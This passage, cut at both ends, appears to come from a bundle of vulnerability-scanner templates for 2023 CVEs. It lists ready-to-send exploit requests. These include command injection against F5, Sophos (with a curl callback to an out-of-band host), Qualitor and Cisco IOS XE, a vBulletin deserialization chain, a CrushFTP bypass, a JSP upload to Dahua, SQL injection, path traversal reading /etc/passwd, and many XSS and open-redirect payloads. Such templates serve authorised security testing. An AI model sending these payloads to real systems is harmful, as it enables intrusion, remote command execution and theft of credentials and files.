{{Hostname}}\nX-F5-Auth-Token: {{token}}\nContent-Type: application/json\n\n{\"command\":\"run\",\"utilCmdArgs\":\"-c id\"}\n\n"],"payloads":{"pass":["{{password2}}","{{hex_decode(password)}}"]},"skip-variables-check":true,"stop-at-first-match":true,"extractors":[{"type":"regex","part":"body_2","name":"token","group":1,"regex":["([A-Z0-9]{26})"],"internal":true},{"type":"regex","part":"body_3","group":1,"regex":["\"commandResult\":\"(.*)\""]},{"type":"dsl","dsl":["\"Username:\" + hex_decode(username)","\"Password:\" + pass","\"Token:\" + token"]}],"matchers":[{"type":"word","words":["commandResult","uid="],"condition":"and"}]}]},{"id":"CVE-2023-6444","info":{"name":"Seriously Simple Podcasting < 3.0.0 - Information Disclosure","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"/wp-content/plugins/seriously-simple-podcasting\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /?feed=itunes HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"<itunes:email>\",\"</itunes:email>\")","contains(content_type,\"text/xml\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-27179","info":{"name":"GDidees CMS v3.9.1 - Arbitrary File Download","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/_admin/imgdownload.php?filename=imgdownload.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["$filename=$_GET[\"filename\"];","@readfile($filename) OR die();"],"condition":"and"},{"type":"word","part":"header","words":["application/force-download"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-49103","info":{"name":"OwnCloud - Phpinfo Configuration","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/{{rand_base(4)}}.css","{{BaseURL}}/owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/{{rand_base(4)}}.css"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["PHP Extension","PHP Version","owncloud"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-40355","info":{"name":"Axigen WebMail - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.hsp?passwordExpired=yes&username=\\'-alert(document.domain),//","{{BaseURL}}/index.hsp?passwordExpired=yes&domainName=\\'-alert(document.domain),//","{{BaseURL}}/index.hsp?m=',alert(document.domain),'"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\\\\'-alert(document.domain),//","',alert(document.domain),'"],"condition":"or"},{"type":"dsl","dsl":["contains(header, \"text/html\")","contains(response, \"Axigen\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-30256","info":{"name":"Webkul QloApps 1.5.2 - Cross-site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?rand=1679996611398&controller=authentication&SubmitCreate=1&ajax=true&email_create=a&back=xss%20onfocus%3dalert(document.domain)%20autofocus%3d%20xss&token=6c62b773f1b284ac4743871b300a0c4d"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["xss onfocus=alert(document.domain) autofocus= xss","hasConfirmation"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-34020","info":{"name":"Uncanny Toolkit for LearnDash - Open Redirection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?rest_route=/ult/v2/review-banner-visibility&action=maybe-later&redirect=yes&redirect_url=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2023-1671","info":{"name":"Sophos Web Appliance - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /index.php?c=blocked&action=continue HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nargs_reason=filetypewarn&url={{randstr}}&filetype={{randstr}}&user={{randstr}}&user_encoded={{base64(\"\\';curl http://{{interactsh-url}} #\")}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2023-6568","info":{"name":"Mlflow - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /api/2.0/mlflow/users/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: <script>alert(document.domain)</script>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Invalid content type:"],"condition":"and"},{"type":"word","part":"content_type","words":["text/html"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2023-36306","info":{"name":"Adiscon LogAnalyzer v.4.1.13 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/loganalyzer/asktheoracle.php?type=domain&query=&uid=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"><script>alert(document.domain)</script>\") && contains(body, \"Adiscon LogAnalyzer\")"],"condition":"and"}]}]},{"id":"CVE-2023-40748","info":{"name":"PHPJabbers Food Delivery Script - SQL Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/index.php?controller=pjAdminOrders%26action%3dpjActionGetNewOrder%26column%3dcreated%26direction%3dASC%26page%3d1%26rowCount%3d50%26q%3d-1910%27)+OR+6100%3d6100%23%26type%3d"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["class <strong>pjAdminOrdersaction","didn't exists"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-30943","info":{"name":"Moodle - Cross-Site Scripting/Remote Code Execution","severity":"medium"},"requests":[{"raw":["GET /lib/editor/tiny/loader.php?rev=a/../../../../html/pix/f/<input><img%20src=x%20onerror=alert(document.domain)>.png HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","GET /login/index.php HTTP/2\nHost: {{Hostname}}\n","POST /login/index.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nanchor=&logintoken={{token}}&username={{username}}&password={{password}}\n","GET /admin/tool/filetypes/edit.php?name=add HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_4","words":["<img src=x onerror=alert(document.domain)>",">archive","File icon"],"condition":"and"},{"type":"word","part":"header_4","words":["text/html"]},{"type":"status","part":"header_4","status":[200]}],"extractors":[{"type":"regex","part":"body","name":"token","group":1,"regex":["name=\"logintoken\" value=\"([a-zA-Z0-9]+)\">"],"internal":true}]}]},{"id":"CVE-2023-6275","info":{"name":"TOTVS Fluig Platform - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/mobileredir/openApp.jsp?redirectUrl=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E","{{BaseURL}}/mobileredir/openApp.jsp?user=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script>","fluig://"],"condition":"and"},{"type":"word","part":"content_type","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0527","info":{"name":"Online Security Guards Hiring System - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /search-request.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsearchdata=<img%20src=x%20onerror=alert(document.domain)>&search=\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"<img src=x onerror=alert(document.domain)>\")","contains(body, \"Online Security Gauard Hiring System |Search Request\")"],"condition":"and"}]}]},{"id":"CVE-2023-43177","info":{"name":"CrushFTP < 10.5.1 - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/WebInterface"],"matchers":[{"type":"dsl","internal":true,"dsl":["contains_all(to_lower(header), \"currentauth\", \"crushauth\")"]}]},{"method":"POST","path":["{{BaseURL}}/WebInterface/function/?command=getUsername&c2f={{http_1_currentauth}}"],"headers":{"Cookie":"CrushAuth={{http_1_crushauth}}; currentAuth={{http_1_currentauth}}","as2-to":"X","user_name":"crushadmin{{dirname}}","user_log_path":"./WebInterface/{{dirname}}/","user_log_file":"{{filename}}","Content-Type":"application/x-www-form-urlencoded"},"body":"post=body\n","matchers":[{"type":"regex","regex":["crushadmin"]}]},{"method":"GET","path":["{{BaseURL}}/WebInterface/{{dirname}}/{{filename}}"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"crushadmin{{dirname}}\")"],"condition":"and"}]}]},{"id":"CVE-2023-0562","info":{"name":"Bank Locker Management System v1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /banker/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin%27+AND+4719%3D4719--+GZHh&inputpwd=ABC&login=\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"admin\")","contains(body, \"BLMS | Dashboard\")"],"condition":"and"}]}]},{"id":"CVE-2023-6380","info":{"name":"OpenCms 14 & 15 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/system/modules/alkacon.mercury.template.jsondemo/elements/jsonapi.jsp?content&fallbackLocale&locale=en&rows=1&uri=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2023-45375","info":{"name":"PrestaShop PireosPay - SQL Injection","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"/modules/pireospay/\")"],"condition":"and","internal":true}]},{"raw":["@timeout: 20\nPOST /module/pireospay/validation HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\najax=true&MerchantReference=1%22;select(0x73656c65637420736c6565702836293b)INTO@a;prepare`b`from@a;execute`b`;--\n"],"host-redirects":true,"max-redirects":3,"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 302","contains(content_type, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2023-39141","info":{"name":"Aria2 WebUI - Path traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}","{{BaseURL}}/../../../../etc/passwd"],"matchers":[{"type":"dsl","dsl":["contains(body_1, \"Aria2 WebUI\")","regex(\"root:x:0:0:\",body_2)"],"condition":"and"}]}]},{"id":"CVE-2023-48241","info":{"name":"XWiki < 4.10.15 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/bin/get/XWiki/SuggestSolrService?outputSyntax=plain&media=json&nb=1000&query=q%3D*%3A*%0Aq.op%3DAND%0Afq%3Dtype%3ADOCUMENT%0Afl%3Dtitle_%2C+reference%2C+links%2C+doccontentraw_%2C+objcontent__&input=+","{{BaseURL}}/xwiki/bin/get/XWiki/SuggestSolrService?outputSyntax=plain&media=json&nb=1000&query=q%3D*%3A*%0Aq.op%3DAND%0Afq%3Dtype%3ADOCUMENT%0Afl%3Dtitle_%2C+reference%2C+links%2C+doccontentraw_%2C+objcontent__&input=+"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"reference\":","title_\":"],"condition":"or"},{"type":"dsl","dsl":["contains(body, \"services.localization.render\")","contains(header, \"application/json\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-39026","info":{"name":"FileMage Gateway - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/mgmnt/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini"],"matchers":[{"type":"dsl","dsl":["contains_all(body,'bit app support','extensions','fonts')","contains(content_type, 'text/plain')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-42442","info":{"name":"JumpServer > 3.6.4 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/terminal/sessions/"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"terminal\":","\"user_id\":\"","\"account_id\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-34753","info":{"name":"bloofoxCMS v0.5.2.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /admin/index.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&action=login\n","@timeout: 10s\nPOST /admin/index.php?mode=settings&page=tmpl&action=edit HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname=default&template=default.html&css=default.css&template_print=print.html&template_print_css=print.css&template_login=login.html&template_text=text.html&be=0&tid='+AND+(SELECT+7401+FROM+(SELECT(SLEEP(6)))hwrS)--+&send=Save\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=6","contains(header_2, \"text/html\")","contains(body_2, 'bloofoxCMS Admincenter')"],"condition":"and"}]}]},{"id":"CVE-2023-47253","info":{"name":"Qualitor <= 8.20 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /html/ad/adpesquisasql/request/processVariavel.php?gridValoresPopHidden=echo%20system(\"ipconfig\"); HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"Windows\",\"DNS\")","contains(content_type,\"text/javascript\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-3836","info":{"name":"Dahua Smart Park Management - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1\nContent-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT\nHost: {{Hostname}}\n\n--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT\nContent-Disposition: form-data; name=\"upload\"; filename=\"{{random_str}}.jsp\"\nContent-Type: application/octet-stream\nContent-Transfer-Encoding: binary\n\n{{match_str}}\n--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT--\n","GET /upload/emap/society_new/{{shell_filename}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 200 && status_code_2 == 200","contains(body_2, '{{match_str}}')"],"condition":"and"}],"extractors":[{"type":"regex","name":"shell_filename","internal":true,"part":"body_1","regex":["ico_res_(\\w+)_on\\.jsp"]}]}]},{"id":"CVE-2023-47117","info":{"name":"Label Studio - Sensitive Information Exposure","severity":"high"},"requests":[{"raw":["GET /user/login/ HTTP/1.1\nHost: {{Hostname}}\n","POST /user/login/?next=/projects/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncsrfmiddlewaretoken={{csrf}}&email={{username}}&password={{password}}&persist_session=on\n","PATCH /api/dm/views/{{Task_id}}?interaction=filter&project={{Project_id}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"id\":{{Task_id}},\"data\":{\"title\":\"Tasks\",\"ordering\":[],\"type\":\"list\",\"target\":\"tasks\",\"filters\":{\"conjunction\":\"or\",\"items\":[{\"filter\":\"filter:tasks:updated_by__active_organization__active_users__password\",\"operator\":\"regex\",\"value\":\"^pbkdf2_sha256\\\\$260000\\\\$\",\"type\":\"String\"}]},\"hiddenColumns\":{\"explore\":[],\"labeling\":[]},\"columnsWidth\":{},\"columnsDisplayType\":{},\"gridWidth\":4,\"search_text\":null},\"project\":\"{{Project_id}}\"}\n","GET /api/tasks?page=1&page_size=30&view={{Task_id}}&interaction=filter&project={{Project_id}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body_4, \"completed_at\", \"file_upload\", \"annotators\")","status_code_3==200 && status_code_4==200","contains(header_4, \"application/json\")"],"condition":"and"}],"extractors":[{"type":"regex","part":"body","name":"csrf","group":1,"regex":["me=\"csrfmiddlewaretoken\" value=\"([a-zA-Z0-9]+)\">"],"internal":true}]}]},{"id":"CVE-2023-22432","info":{"name":"Web2py URL - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /admin/default/index HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\npassword={{password}}&send=%5C%2F%5C%2Foast.pro&login=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["a href=\"\\/\\/oast.pro\""]},{"type":"word","part":"location","words":["\\/\\/oast.pro"]},{"type":"status","status":[303]}]}]},{"id":"CVE-2023-38433","info":{"name":"Fujitsu IP Series - Hardcoded Credentials","severity":"high"},"requests":[{"raw":["GET /b_download/index.html HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic {{base64(username + ':' + password)}}\n"],"attack":"pitchfork","payloads":{"username":["fedish264pro","fedish265pro"],"password":["h264pro@broadsight","h265pro@broadsight"]},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Field Support"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-35161","info":{"name":"XWiki >= 6.2-milestone-1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/xwiki/bin/view/AppWithinMinutes/DeleteApplication?appName=Menu&resolve=true&xredirect=javascript:alert(document.domain)","{{BaseURL}}/bin/view/AppWithinMinutes/DeleteApplication?appName=Menu&resolve=true&xredirect=javascript:alert(document.domain)"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["javascript:alert(document.domain)","DeleteApplication","data-xwiki"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200,401]}]}]},{"id":"CVE-2023-25135","info":{"name":"vBulletin <= 5.6.9 - Pre-authentication Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /ajax/api/user/save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nadminoptions=&options=&password={{randstr}}&securitytoken={{randstr}}&user%5Bemail%5D=pown%40pown.net&user%5Bpassword%5D=password&user%5Bsearchprefs%5D=a%3a2%3a{i%3a0%3bO%3a27%3a\"googlelogin_vendor_autoload\"%3a0%3a{}i%3a1%3bO%3a32%3a\"Monolog\\Handler\\SyslogUdpHandler\"%3a1%3a{s%3a9%3a\"%00*%00socket\"%3bO%3a29%3a\"Monolog\\Handler\\BufferHandler\"%3a7%3a{s%3a10%3a\"%00*%00handler\"%3br%3a4%3bs%3a13%3a\"%00*%00bufferSize\"%3bi%3a-1%3bs%3a9%3a\"%00*%00buffer\"%3ba%3a1%3a{i%3a0%3ba%3a2%3a{i%3a0%3bs%3a14%3a\"CVE-2023-25135\"%3bs%3a5%3a\"level\"%3bN%3b}}s%3a8%3a\"%00*%00level\"%3bN%3bs%3a14%3a\"%00*%00initialized\"%3bb%3a1%3bs%3a14%3a\"%00*%00bufferLimit\"%3bi%3a-1%3bs%3a13%3a\"%00*%00processors\"%3ba%3a2%3a{i%3a0%3bs%3a7%3a\"current\"%3bi%3a1%3bs%3a8%3a\"var_dump\"%3b}}}}&user%5Busername%5D={{randstr}}&userfield=&userid=0\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["string(14)","\"CVE-2023-25135\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-6021","info":{"name":"Ray API - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/nodes?view=summary","{{BaseURL}}/api/v0/logs/file?node_id={{nodeid}}&filename=../../../../../etc%2fpasswd&lines=50000"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body_2","regex":["root:.*:0:0:"]},{"type":"word","part":"header_2","words":["text/plain","aiohttp"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"json","part":"body","internal":true,"name":"nodeid","json":["..|objects|.nodeId//empty[0]"]}]}]},{"id":"CVE-2023-45542","info":{"name":"MooSocial 3.1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/search/index/?q=test%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3etest"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"<script>alert(document.domain)</script>\", \"mooSocial\")"],"condition":"and"}]}]},{"id":"CVE-2023-35156","info":{"name":"XWiki >= 6.0-rc-1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/xwiki/bin/get/FlamingoThemes/Cerulean?xpage=xpart&vm=delete.vm&xredirect=javascript:alert(document.domain)","{{BaseURL}}/bin/get/FlamingoThemes/Cerulean?xpage=xpart&vm=delete.vm&xredirect=javascript:alert(document.domain)"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["cancel\" href=\"javascript:alert(document.domain)"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200,401]}]}]},{"id":"CVE-2023-2949","info":{"name":"OpenEMR < 7.0.1 - Cross-site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/interface/forms/eye_mag/js/eye_base.php?providerID=%3Cimg%20src=x%20onerror=alert(document.domain);%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/html\")","contains_all(body, \"<img src=x onerror=alert(document.domain);>\", \"openemr\")"],"condition":"and"}]}]},{"id":"CVE-2023-28432","info":{"name":"MinIO Cluster Deployment - Information Disclosure","severity":"high"},"requests":[{"raw":["POST /minio/bootstrap/v1/verify HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"MINIO_ROOT_PASSWORD\":","\"MINIO_ROOT_USER\":","\"MinioEnv\":"],"condition":"or"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-4113","info":{"name":"PHPJabbers Service Booking Script 1.0 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?controller=pjFrontPublic&action=pjActionServices&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"Select Service(s)\", \"><script>alert(document.domain)</script>\")"],"condition":"and"}]}]},{"id":"CVE-2023-2813","info":{"name":"Wordpress Multiple Themes - Reflected Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?s={{str}}%3CIMG%20%22%22%22%3E%3CIMG%20SRC=/%20onerror=%22alert(document.domain)%22%3E%3C/img%3E/{{random}}/"],"matchers-condition":"and","matchers":[{"type":"word","words":["<IMG SRC=/ onerror=\"alert(document.domain)\"></img>","wp-content/theme"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-23752","info":{"name":"Joomla! Webservice - Password Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/index.php/v1/config/application?public=true","{{BaseURL}}/api/v1/config/application?public=true"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"links\":","\"attributes\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json","application/vnd.api+json"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0947","info":{"name":"Flatpress < 1.3 - Path Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/fp-content/","{{BaseURL}}/flatpress/fp-content/"],"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"<title>Index of /fp-content</title>\")"],"condition":"and"}]}]},{"id":"CVE-2023-6831","info":{"name":"mlflow - Path Traversal","severity":"high"},"requests":[{"raw":["PUT /api/2.0/mlflow-artifacts/artifacts/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{{randstr}}\n","DELETE /api/2.0/mlflow-artifacts/artifacts/%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252Fetc%252fpasswd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header_2","words":["Content-Type: application/json","Server: gunicorn"],"condition":"and"},{"type":"word","part":"body_2","words":["{}"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2023-45855","info":{"name":"qdPM 9.2 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/uploads/"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Index of /uploads</title>","attachments/</a>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-20198","info":{"name":"Cisco IOS XE - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /%2577eb%2575i_%2577sma_Http HTTP/1.1\nHost: {{Hostname}}\n\n<?xml version=\"1.0\"?> <SOAP:Envelope xmlns:SOAP=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:SOAP-ENC=\"http://schemas.xmlsoap.org/soap/encoding/\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"> <SOAP:Header> <wsse:Security xmlns:wsse=\"http://schemas.xmlsoap.org/ws/2002/04/secext\"> <wsse:UsernameToken SOAP:mustUnderstand=\"false\"> <wsse:Username>admin</wsse:Username><wsse:Password>*****</wsse:Password></wsse:UsernameToken></wsse:Security></SOAP:Header><SOAP:Body><request correlator=\"exec1\" xmlns=\"urn:cisco:wsma-exec\"> <execCLI xsd=\"false\"><cmd>{{cmd}}</cmd><dialogue><expect></expect><reply></reply></dialogue></execCLI></request></SOAP:Body></SOAP:Envelope>"],"matchers":[{"type":"regex","part":"body","regex":["XMLSchema","execLog","Cisco Systems","<text>","<received>"],"condition":"and"}],"extractors":[{"type":"regex","part":"body","group":1,"regex":["<text>\\n(.*)\\["]}]}]},{"id":"CVE-2023-1546","info":{"name":"MyCryptoCheckout < 2.124 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=mycryptocheckout&tab=autosettlements&\"><script>alert(/XSS/)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"scriptalert(/XSS/)/script\")","contains(body_2, \"mycryptocheckout\")"],"condition":"and"}]}]},{"id":"CVE-2023-40750","info":{"name":"PHPJabbers Yacht Listing Script v1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/index.php?controller=pjAdmin&action=%3Cimg+src%3Dx+onerror%3Dprompt%28document.domain%29%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=prompt(document.domain)>","didn't exists"],"condition":"and"},{"type":"word","part":"content_type","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-40208","info":{"name":"Stock Ticker <= 3.23.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=stockticker_load&symbols=MSFT&class=%22+onmousemove%3Dalert%28document.domain%29+\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["stock_ticker","onmousemove=alert(document.domain)"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-2309","info":{"name":"wpForo Forum <= 2.1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /community/main-forum/?param=%3Cscript%3Ealert(/document.domain/)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"<script>alert(/document.domain/)</script>\",\"wpforo\")","contains(header,\"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-41538","info":{"name":"PHPJabbers PHP Forum Script 3.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/preview.php?controller=pjLoad&action=pjActionIndex&question_search=1&pjPage=1&column=created&direction=DESC&keyword=%22><script>alert(document.domain)</script>"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"New Question\", \"><script>alert(document.domain)</script>\")"],"condition":"and"}]}]},{"id":"CVE-2023-40755","info":{"name":"PHPJabbers Callback Widget v1.0 - Cross-Site 